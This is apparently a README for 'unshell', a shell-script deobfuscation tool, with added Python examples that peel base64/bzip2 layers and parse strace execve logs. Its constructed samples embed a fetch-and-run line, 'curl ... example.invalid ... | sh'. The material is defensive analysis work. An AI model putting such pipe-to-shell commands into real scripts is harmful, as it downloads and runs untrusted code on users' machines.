
Unshell

The Script Kiddies' Nightmare

Effortlessly deobfuscate shell scripts back into their source, even through heavy, multi-layered obfuscation. unshell searches the shell script for known patterns, determines which obfuscation method was used, and deobfuscates accordingly.

Features

  • Zero configuration: there is nothing to configure
  • Penetrate: multi-layered obfuscation is not a problem
  • Easy to use: just run unshell -f encrypted1 encrypted2 from the command line

Supported obfuscation methods

  • Shell Script Compiler (SHC): the compiled binary decrypts the script at runtime and calls execve on a shell with the script in the command line, so it is visible in the process's arguments, e.g. /bin/sh -c "decrypted shell".
  • Simple Script Compiler (SSC): works almost the same as SHC, but is written in C++ and the shell reads the script from file descriptor 3, so it is visible through fd 3 of the process.
  • Ri-crypt: decrypts at runtime and calls execve on a shell, as SHC does; the script is visible in the process's arguments and can be retrieved with strace.
  • bash-obfuscate (Node.js CLI): rewrites the script with randomized variable names and then executes it through eval.
  • Bashrock: works almost the same way as bash-obfuscate.
  • TPP Tool: its author claims it "has an anti-decode feature", but the multi-layered base64 encoding it uses is easily decoded. At the time of writing, unshell supports up to version 12 of this "tool".
  • BashProtector: rewrites the script with randomized variable names, wraps it in a single layer of base64 encoding, and executes it with a single eval.
  • Extreme comment / editor EOF trick: the script is padded with an enormous number of comment lines until the file is so large that an average text editor chokes when opening it, so people cannot read it.
  • bzip2: usually used on tunneling/VPN scripts; the actual script is compressed with bzip2 and embedded inside the decompression script itself.
  • Axeron online module: the actual script is hosted online (usually on public GitHub pages, typical script-kiddie behavior) and the module only downloads and executes it; the URL itself is obfuscated with base64 and rot17.
  • base64: nothing fancy, just the classic echo "ZWNobyBzb21lIGJhc2U2NCBlbmNyeXB0ZWQgc2hpdAo=" | base64 -d | sh.
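The static methods in the list above (classic base64, the BashProtector/TPP-style eval-over-base64 wrappers, bzip2 in the decode pipeline, and comment padding) can all be peeled without executing anything. The Python below is an added example written for this page, not unshell's own code (unshell is a shell script) and not code from any of the tools named above; the wrapper shapes in LAYER_RE, the helper names (strip_padding, peel_layer, unwrap, wrap_layer), the PAYLOAD text and the SAMPLE input built from it are all assumptions constructed for the example. It goes slightly beyond the list by handling all of those layers in one loop, stripping padding between layers so the pattern match is not fooled by bloat.

```python
import base64
import binascii
import bz2
import re
from typing import Optional, Tuple

# One wrapper layer as the tools above emit it (shapes assumed for this example):
#   echo "<b64>" | base64 -d | sh                    classic base64
#   eval "$(echo "<b64>" | base64 -d)"               BashProtector-style single eval
#   echo "<b64>" | base64 -d | bzip2 -dc | sh        bzip2-compressed payload
LAYER_RE = re.compile(
    r"echo\s+(?:-n\s+)?['\"]?(?P<b64>[A-Za-z0-9+/=]{8,})['\"]?"
    r"\s*\|\s*base64\s+(?:-d|--decode)\b"
    r"(?P<bz>\s*\|\s*(?:bzip2\s+-dc?|bzcat)\b)?"
)

# Whole-line comments other than the shebang (the "extreme comment" padding trick).
PADDING_RE = re.compile(r"^[ \t]*#(?!!).*$\n?", re.MULTILINE)


def strip_padding(script: str) -> str:
    """Drop comment lines and collapse blank runs. Caveat: a '#' line inside a heredoc
    is data, not a comment; this pass does not track heredocs, so diff the result
    against the original before trusting it."""
    return re.sub(r"\n{3,}", "\n\n", PADDING_RE.sub("", script))


def peel_layer(script: str) -> Optional[str]:
    """Return the script hidden under the first recognised wrapper, or None."""
    m = LAYER_RE.search(script)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group("b64"), validate=True)
    except binascii.Error:
        return None
    if m.group("bz"):
        try:
            raw = bz2.decompress(raw)
        except (OSError, ValueError):
            return None
    return raw.decode("utf-8", errors="replace")


def unwrap(script: str, max_layers: int = 64) -> Tuple[str, int]:
    """Peel wrapper layers until nothing matches; returns (plain script, layers removed).
    max_layers guards against a blob that decodes back to itself looping forever."""
    layers = 0
    script = strip_padding(script)
    while layers < max_layers:
        inner = peel_layer(script)
        if inner is None:
            break
        script = strip_padding(inner)
        layers += 1
    return script, layers


# --- constructed sample input (not a real obfuscated script) ------------------
PAYLOAD = "#!/bin/sh\necho 'real script here'\ncurl -s http://example.invalid/x | sh\n"


def wrap_layer(script: str, use_bzip2: bool = False, pad_lines: int = 0) -> str:
    """Build one wrapper layer the way the tools above do (assumed shapes)."""
    data = bz2.compress(script.encode()) if use_bzip2 else script.encode()
    pipe = " | base64 -d | bzip2 -dc | sh" if use_bzip2 else " | base64 -d | sh"
    padding = "".join("# padding line %d\n" % n for n in range(pad_lines))
    return "#!/bin/sh\n" + padding + 'echo "' + base64.b64encode(data).decode() + '"' + pipe + "\n"


# three layers: bzip2 innermost, then plain base64, then base64 under 3000 comment lines
SAMPLE = wrap_layer(wrap_layer(wrap_layer(PAYLOAD, use_bzip2=True)), pad_lines=3000)

if __name__ == "__main__":
    plain, n = unwrap(SAMPLE)
    print("removed %d layer(s):\n%s" % (n, plain))
```

On a real file, call unwrap(open(path).read()). When the innermost layer is an eval over shell variables (bash-obfuscate/Bashrock style) rather than a base64 blob, this static pass stops there; continue by reading the argument handed to eval, not by executing it.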

Installation

```shell
# Installs into the first directory on PATH, which must be writable by you.
# This fetches whatever is on the main branch at that moment; read the file before running it.
spath=$(printf '%s\n' "$PATH" | cut -d: -f1)
curl -sLo "$spath/unshell" https://github.com/Rem01Gaming/unshell/raw/main/unshell
chmod +x "$spath/unshell"
```

Usage

```text
unshell - Deobfuscate any shell scripts with multiple methods
  Usage: unshell [OPTIONS] [FILE]
  Usage: unshell [OPTIONS] [DIR]

  Options:
    -h, --help
      print this message
    -f, --file [FILE]
      Scripts you want to deobfuscate, multiple inputs are supported
    -r, --recursive [DIR]
      Recursively find and deobfuscate all files in the specified directory
    -v, --verbose
      Be verbose
    -d, --execve-delay [SECOND]
      Set a custom execve delay time in seconds for SHC and SSC encryption
    -U, --update
      Update the script

  Example usages:
    unshell -f install.sh menu.sh
    unshell -v -f /system/bin/gaming_script
    unshell -d 6.018 -f ./VTK
    unshell -r .
```

WARNING

Using unshell to recover the original shell script from SHC, SSC, or Ri-crypt obfuscation can harm your machine: these obfuscation types require executing the binary in order to deobfuscate it, so whatever the script does, malicious or not, actually runs. Never run unshell as root unless you fully trust the script, and for these three types prefer a disposable VM or container that you can throw away afterwards.
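When you do have to execute an SHC, SSC or Ri-crypt binary, a safer workflow than reading /proc by hand on your own host is to run it in a throwaway VM or container under strace -f -s 999999 -e trace=execve -o trace.log ./binary and recover the script from the trace file afterwards. The parser below is an added example written for this page, not part of unshell or of decsh/universal-shell-dec: it reads strace's execve lines (with either the "pid execve(" or "[pid N] execve(" prefix, C-style escapes, \ooo octal bytes and the "... truncation marker) and returns the script bodies passed to a shell after -c, which is the shape this README describes for SHC and Ri-crypt. The SAMPLE_TRACE text is constructed in strace's format for the example and is not real tool output; the function names are assumptions.

```python
import os
import re
from typing import List, Optional, Tuple

# Start of an execve line in strace output, with or without a pid prefix:
#   "4242 execve("           (strace -f -o file)
#   "[pid  4242] execve("    (strace -f to stderr)
#   "execve("                (no -f)
EXECVE_RE = re.compile(r"^\s*(?:\[pid\s+\d+\]\s*|\d+\s+)?execve\(")

# Single-character escapes strace emits inside string literals.
_SIMPLE_ESCAPES = {"n": 10, "t": 9, "r": 13, "f": 12, "v": 11, "a": 7, "b": 8,
                   "e": 27, '"': 34, "\\": 92}


def read_cstring(s: str, i: int) -> Tuple[str, int]:
    """Decode the C-style string literal starting at s[i] == '"'.
    Handles \\n-style escapes, \\ooo octal bytes and \\xHH (strace -x).
    Returns (decoded text, index just past the closing quote)."""
    if s[i] != '"':
        raise ValueError("expected '\"' at offset %d" % i)
    i += 1
    buf = bytearray()
    while i < len(s):
        c = s[i]
        if c == '"':
            return buf.decode("utf-8", errors="replace"), i + 1
        if c != "\\":
            buf.extend(c.encode("utf-8"))
            i += 1
            continue
        n = s[i + 1]
        if n in "01234567":                      # up to three octal digits
            j = i + 1
            while j < len(s) and j < i + 4 and s[j] in "01234567":
                j += 1
            buf.append(int(s[i + 1:j], 8) & 0xFF)
            i = j
        elif n == "x":                           # two hex digits
            buf.append(int(s[i + 2:i + 4], 16))
            i += 4
        else:
            buf.append(_SIMPLE_ESCAPES.get(n, ord(n)))
            i += 2
    raise ValueError("unterminated string literal")


def parse_execve(line: str) -> Optional[Tuple[str, List[str]]]:
    """Return (path, argv) for one strace execve line, or None if it is not one."""
    m = EXECVE_RE.match(line)
    if not m:
        return None
    try:
        path, i = read_cstring(line, m.end())
        if not line.startswith(", [", i):
            return None
        i += 3
        argv: List[str] = []
        while i < len(line) and line[i] == '"':
            arg, i = read_cstring(line, i)
            if line.startswith("...", i):        # strace cut this string: rerun with a bigger -s
                i += 3
            argv.append(arg)
            if line.startswith(", ", i):
                i += 2
    except (ValueError, IndexError):             # malformed or unfinished line
        return None
    return path, argv


SHELLS = {"sh", "bash", "dash", "ash", "zsh", "ksh", "mksh"}


def recover_scripts(trace: str) -> List[Tuple[str, str]]:
    """Collect every script body a traced process handed to a shell via -c."""
    found = []
    for line in trace.splitlines():
        parsed = parse_execve(line)
        if parsed is None:
            continue
        path, argv = parsed
        if os.path.basename(path) not in SHELLS:
            continue
        for k, arg in enumerate(argv[:-1]):
            if arg == "-c":
                found.append((path, argv[k + 1]))
                break
    return found


# Constructed sample in strace's format (not real output): the packed binary starts,
# execs /bin/sh -c <decrypted script>, and that script runs curl in a child.
SAMPLE_TRACE = (
    '4242 execve("./packed", ["./packed"], 0x7ffc2a10 /* 12 vars */) = 0\n'
    '4242 execve("/bin/sh", ["/bin/sh", "-c", "#!/bin/sh\\necho \\"caf\\303\\251\\"\\n'
    'curl -s http://example.invalid/p | sh\\n"], 0x55d1e0 /* 12 vars */) = 0\n'
    '[pid  4243] execve("/usr/bin/curl", ["curl", "-s", "http://example.invalid/p"], '
    '0x55d1f0 /* 12 vars */) = 0\n'
)

if __name__ == "__main__":
    for shell, script in recover_scripts(SAMPLE_TRACE):
        print("== script passed to %s ==" % shell)
        print(script)
```

For SSC, which hands the script over on fd 3 instead of argv, trace reads as well (-e trace=execve,read) or copy /proc/PID/fd/3 while the shell is running; the execve parser above still tells you which pid to look at.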

Special Credits

  • kawaii-ghost for decsh (SHC and SSC deobfuscator).
  • RiProG-id for universal-shell-dec, the inspiration and foundation of this project.